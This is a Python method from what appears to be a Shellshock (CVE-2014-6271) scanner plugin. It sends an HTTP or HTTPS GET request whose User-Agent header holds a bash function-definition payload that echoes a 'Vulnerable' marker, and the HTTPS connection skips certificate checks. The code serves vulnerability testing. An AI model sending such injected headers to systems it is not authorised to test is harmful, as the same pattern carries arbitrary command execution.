def process_task(self, server_connectivity_info, plugin_command, option_dict=None):
if option_dict and 'path' in option_dict.keys():
path = str(option_dict['path'])
else:
path = '/'
if server_connectivity_info.port == 80:
conn = httplib.HTTPConnection(server_connectivity_info.ip_address,server_connectivity_info.port)
elif server_connectivity_info.port == 443:
conn = httplib.HTTPSConnection(server_connectivity_info.ip_address,server_connectivity_info.port,context=ssl._create_unverified_context())
else:
raise ValueError("ShellshockTesterPlugin: Can\'t make test for this port {0}".format(server_connectivity_info.port))
try:
conn.connect()
except Exception as e:
raise ValueError("ShellshockTesterPlugin: Connection error for port {0}. {1}".format(server_connectivity_info.port,str(e)))
else:
conn.request("GET", path, "", {'User-Agent': '() { :; }; echo; echo Vulnerable to CVE-2014-6271'})
response = conn.getresponse()
return ShellshockTesterResult(server_connectivity_info, plugin_command, option_dict, self.is_vulnerable(response))
评论列表
文章目录